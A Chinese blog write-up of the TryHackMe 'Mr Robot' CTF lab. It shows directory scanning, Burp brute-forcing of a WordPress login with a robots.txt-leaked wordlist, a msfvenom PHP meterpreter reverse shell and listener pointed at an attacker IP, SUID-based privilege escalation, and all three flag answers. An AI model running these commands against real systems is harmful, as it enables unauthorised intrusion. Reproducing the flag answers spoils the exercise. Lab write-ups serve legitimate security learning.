Mr Robot CTF「ROBOTS.TXT 信息泄露+WP爆破」

已于 2022-05-06 15:22:05 修改
阅读量1.8k 收藏 2
点赞数 4
文章标签: 其他
于 2022-04-30 03:12:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AKAHRZ/article/details/124506664
版权

TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG!

MR.ROBOT

Mr Robot CTF「ROBOTS.TXT 信息泄露+WP爆破」

THM靶场:Mr Robot CTF

本来这个礼拜打算继续做靶场GAME ZONE,那是一个sql注入的靶场,因为之前对sql注入漏洞了解的比较多,几乎很快就做完了,结果当我今天(周五)准备写博客时,发现我的THM会员过期了,我直接WTF?花了十刀充值了,结果系统不知道为啥抽风了,一天都没有到账,我赶快补救了下,这次的靶场比较简单,主要是利用robots.txt泄露的一个字典文件对WP的用户名密码进行爆破,最终提权至root,但是也是比较有意思的一个靶场,不得不说页面做的挺酷炫的,but just so so~Let’s HACK IT ! ! !

I AM ROBOT?

连接上靶机,有一段十分炫酷的代码,意思是如果你厌倦了这个社会balabalabala,有兴趣的可以看一下:
首页

但是我们还是常规套路(冷酷),使用nmap扫描,然后cat获取扫描果:

nmap -p- -sC -sV -T4 -vv 10.10.255.128 -on nmap/initial //扫描开始,将结果保存在nmap/initial中
cat nmap/initial //获取扫描结果

开始扫描

扫描太慢了,们直接推测,题中说robots,是不是有可能是在robots.txt中有提示呢?Robots.txt 是网站管理员创建的一个文本文件,用于指导网络机器人(通常是搜索引擎机器人)如何抓取其网站上的页面浏览robots.txt我们直接发现了第一题的flag,和一个字典,推测可能后面爆破后台用的上

Q1:What is key 1?
A1:073403c8a58a1f80d943455fb30724b9

接下来,gobuster来爆破一波网站目录,命令如下:

gobuster dir -u http://10.10.255.128/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  --status-codes 200

扫描结果

可以看出,我们还是爆出来了许多有用的目录的,admin、login应该就是登录页面了,我们先试一波login,显而易见是一个wordpress的登陆页面

wp登录页面

解答视频里说用hydra,但是我们偏不,能用burpsuit解决的问题为啥用hydra呢?直接开干!打开代理和bp,随便输一个用户名和密码,用bp抓包

抓包成功
把抓到的包送到intruder,即爆破选项,清楚所有的$符,仅仅给用户名套上符号
爆破准备
最后,在payload里将之前我们在robots文件里发现的字典导入,然后开始爆破,由于KALI这里自带的bp没有破解,速度比较慢,我直接用win10上的bp继续测试了

长度不同
可以看到,用户名为Elliot时,相应不同,为“请输入正确的密码”,由此得到用户名为Elliot,再用同样的手段爆破密码,可得到密码为ER28-0652,输入用户名和密码,我们成功进入后台!
WP后台
接下来进入Appearance –> Editor –> 404 Template,在这里我们可以执行我们的脚步,先使用msfvenomen生成我们的shell,命令如下:

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.2.118.230 LPORT=4444 -f raw -o hangzai.php

生成成功

然后使用msf设置我们的监听以获取shell,命令:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 10.2.118.230
set LPORT 4444
run

将我们生成的shell文件放在404中上传后在URL中访问,成功获得shell:
获取shell成功
直接一顿操作,但是获取flag权限太低,获取失败,却获得了robot的密码,直接放入在线网站破解(也可使用john),得到密码为:abcdefghijklmnopqrstuvwxyz
cat flag
密码破解
使用python命令进入终端:

python -c 'import pty; pty.spawn("/bin/bash")'

然后su robot 输入密码获取root权限,获得第二个flag:
get flag
Q2:What is key 2?
A2:822c73956184f694993bede3eb39f959

现在就差最后一个flag,题目给的提示为nmap,可能是要利用nmap来提升权限,先使用命令查看有无nmap进程:

find / -perm +6000 2>/dev/null | grep '/bin/'

可以看到nmap正在运行

看了大佬的一些writeup,发现 Nmap 有一个弱点,您可以将其设置为交互模式。这允许在 nmap 内运行 shell 命令,从而帮助我们完成提权:

get all of the flag!
Q3:What is key 3?
A3:04787ddef27c3dee1ee161b21670b4e4

Mr Robot 靶场通关小结

在这个房间中,我们一起学习了利用robots.txt泄露的一个字典文件对WP的用户名密码进行爆破,最终提权至root,但是也是比较有意思的一个靶场,不得不说页面真的挺酷炫的,虽然是THM里OSCP路线最简单的一个靶场了。最后我放几张这个靶场里面的一些页面,也算是一些彩蛋吧,同时也非常欢迎大家私信我,如果觉得内容做的不错的话,也可以关注我的公众号:HACKER 航仔 以获取最新消息并与我联系,十分感谢能看到这里的各位,虽然制作不易,看到你们的点赞我还是很开心的!我们下期再见,拜了个拜~~~

”冒牌英雄“

“爱国者”

截止到博客写完前,以上所有内容均被删除,这就是自由美利坚嘛?呵呵

AKA航仔
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全 | CTF】攻防世界 robots 解题详析
等风来
05-20 4031
通常,网站管理员会在网站的根目录下放置一个名为robots.txt的文件,并使用该文件指定他们希望搜索引擎索引和不索引的页面。题目描述:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。robots.txt是一种文本文件,则指示搜索引擎不要抓取网站中包含在。被设置为禁止爬取,访问即可。指定所有搜索引擎爬虫,而。进入靶机,页面空白。文件夹中的任何内容。
帝国CMS中robots.txt文件用法
09-29
在帝国CMS中,`robots.txt`文件是一个至关重要的元素,它用于指导搜索引擎爬虫如何抓取网站的内容。本文将详细探讨`robots.txt`文件的原理、作用以及在帝国CMS中的具体应用。 **robots协议的原理** `robots协议`,...
TRY HACK ME | Hack Park 「Hydra+Winpeas」
AKAHRZ的博客
04-23 3724
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Steel Mountain「利用powershell提权」THM靶场:Steel MountainTASK1 谁是最佳员工?TASK2 获得初始 shellTA.
CTF-Web入门-robots
qq_28383747的博客
11-04 1393
本题是一道Web方向的入门题目,重点在于理解robots协议相关知识。robots协议也称为爬虫协议、爬虫规则等,它会建立robots.txt文件来告诉搜索引擎哪些页面可以抓取,哪些不可以抓取。爬虫访问一个站点时,会首先检查站点的根目录下是否存在robots.txt文件。这也是为什么尝试在地址栏中输入/robots.txt的原因。
Web应用安全测试-信息泄漏
最新发布
06-07 1393
Web应用安全测试-信息泄漏,列举常见漏洞描述、测试方法、风险等级级修复建议
tryhackme靶场: Mr Robot CTF
m0_64348326的博客
06-20 262
6.再来爆破出密码,这里字典太长且有很多数据重复,直接查看这部分的结果,在第八万多条的。8.根据选项面版RCE描述的方法,主题编辑器右侧找到404页面,添加。搭建的博客站登陆页面,根据登陆时的报错回显,利用下载的字典和。按照最新版的burp社区版爆破速度,估计要爆破到靶机结束。解密,但是还是得付费。需要收费,只能手动搜索了。,由于Linux系统的问题后面不需要再加。工具配合默认字典进行目录扫描,结果中的。7.进入后台后,准备查找历史漏洞,但是。命令,发现要输入密码,读取目录下的。命令开出bash命令窗。
THM靶场blog
m0_64777251的博客
04-10 369
nmap一下看到445端口我先直接尝试用ms17-010发现不行这里发现它使用的cms版本为WordPress5.0用msf搜索这个存在的历史漏洞。
robots.js:用于robots.txt的用于node.js的解析器
05-02
robots.js robots.js —是node.js的文件的解析器。 安装 建议通过安装: $ npm install -g robots 用法 这是使用robots.js的示例: var robots = require ( 'robots' ) , parser = new robots . RobotsParser ( ...
robots-module:用于robots.txt的NuxtJS模块
05-06
Nuxt.js模块,该模块注入了中间件以生成robots.txt文件 设置 将@nuxtjs/robots依赖项添加到您的项目中 yarn add @nuxtjs/robots # or npm install @nuxtjs/robots 添加@nuxtjs/robots的modules的部分nuxt.config....
mr-roboto::robot:处理并解析网站的robots.txt文件并提取可操作的信息
02-04
`mr-roboto` 是一个专门用于处理和解析网站`robots.txt`文件的JavaScript库。`robots.txt`文件是网站所有者用来向网络爬虫指示哪些页面可以抓取,哪些不能抓取的文本文件。这个库提供了一个简洁的API,使得开发者...
robots.txtrobots.txt即服务。 抓取robots.txt文件,下载并解析它们以通过API检查规则
02-04
:robot: robots.txt即服务 :robot: :construction: 开发中的项目 通过API访问权限的分布式robots.txt解析器和规则检查器。 如果您正在使用分布式Web爬网程序,并且想要礼貌行事,那么您会发现此项目非常有用。 另外...
CTF知识库】robots.txt
国服可爱玩家的BLOG
06-13 594
CTF知识库】robots.txt
TRY HACK ME |Alfred「利用Jenkins配置错误提权」
AKAHRZ的博客
04-16 450
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Alfred「利用Jenkins配置错误提权」THM靶场:AlfredTASK1 谁是最佳员工?TASK2 获得初始 shellTASK3 权限提升TASK4 不.
robots.txt文件信息泄漏
fansenliangren的博客
11-21 2531
搜索引擎可以通过robots文件可以获知哪些页面可以爬取,哪些页面不可以爬取。robots.txt文件可能会泄露网站的敏感目录或者文件,比如网站后台路径,从而得知其使用的系统类型,从而有针对性地进行利用。
ctfshow做题记录(二)
qq_73975638的博客
04-10 504
题目中介绍了关于mdb文件的一些知识,于是想这这个题应该跟mdb文件有关,于是在网址后加上/db/db.mdb访问,下载下来一个mdb文件,用记事本打开后发现是一堆乱码,于是尝试搜索了一下ctf,找到了flag。打开题目后发现是一个登录页面,尝试了一下最普遍的账号admin,密码123456发现并没有啥用,于是就查看了源代码,在后面发现了账号密码,但是输入后还是显示密码错误,于是准备尝试一下用bp抓包。根据题目中所说,公开的信息可能会造成信息泄露,比如邮箱,然后确实在网页中找到了一个公开的QQ邮箱。
robots 攻防世界
天天学安全专属博客
04-02 3119
1.首先看题目,一般题目提升的信息都非常有用 2.看到了一个重要的东西Robots协议 Robots协议: 1.搜索引擎通过一种程序robot 自动访问互联网上的网页并获取网页信息。 2.您可以在您的网站中创建一个纯文本文件robots.txt,在这个文件中声明该网站中不想被robot访问的部分 3.robots.txt文件应该放在网站根目录下,一般是目标网址/robots.txtrobots.txt文件中: 1.User-agent:描述搜索引擎robot的名
【Web方向】 敏感文件查询
wanderer的博客
11-14 1120
ctf敏感文件泄露
CTF】Web robots 通关教程
qq_45196785的博客
09-26 337
robots.txt是一个用于指示搜索引擎爬虫如何访问网站内容的文本文件。6、查看robots.txt,拼接Disallow下的html。3、火狐浏览器乱码,可将页面编码调为UTF-8。1、练习中心 - 题目列表 - Web。2、查看题目-启动动态环境。5、修复文字编码-折叠菜单。4、更多工具-定制工具栏。
【信安学习之路】robots.txt
Nafia的博客
01-26 1063
robots.txt文件简单认知
robot.txt协议
06-08
robots.txt 是一个标准,用于网站告诉搜索引擎哪些网页可以被抓取,哪些网页不能被抓取。它通常放置在网站的根目录下,名为 robots.txtrobots.txt 协议的作用是: 1. 告诉搜索引擎哪些页面可以抓取,哪些页面不可以抓取; 2. 控制搜索引擎抓取频率,避免对网站造成过大的负载压力; 3. 避免搜索引擎抓取到敏感信息或隐私数据。 robots.txt 的格式很简单,每个指令只有两部分: 1. User-agent:指定搜索引擎的名称,比如 Googlebot; 2. Disallow:指定不允许抓取的页面或目录,可以使用通配符 *。 例如,下面是一个简单的 robots.txt 文件: ``` User-agent: * Disallow: /admin/ Disallow: /secret/ ``` 上面的代码表示,允许所有的搜索引擎抓取网站的所有页面,但是不允许抓取 /admin/ 和 /secret/ 目录下的页面。当搜索引擎抓取网站时,会首先查找 robots.txt 文件,根据其中的规则进行抓取。如果没有 robots.txt 文件,搜索引擎会默认抓取网站的所有页面。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值